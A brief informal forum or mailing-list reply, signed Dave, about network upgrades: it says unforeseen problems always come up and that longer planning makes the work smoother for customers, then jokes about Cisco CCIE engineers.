Thing is, in theory the upgrades would go fine; in practice they won't - you'll hit SOME funny that you couldn't have predicted, and the consequences are just too serious to let it go. The longer you have to plan and enact the upgrade, the smoother it'll go, and the less hurt you'll cause your customers.
You're right though. Cisco CCIEs are one step from godhood. I fear them.
Dave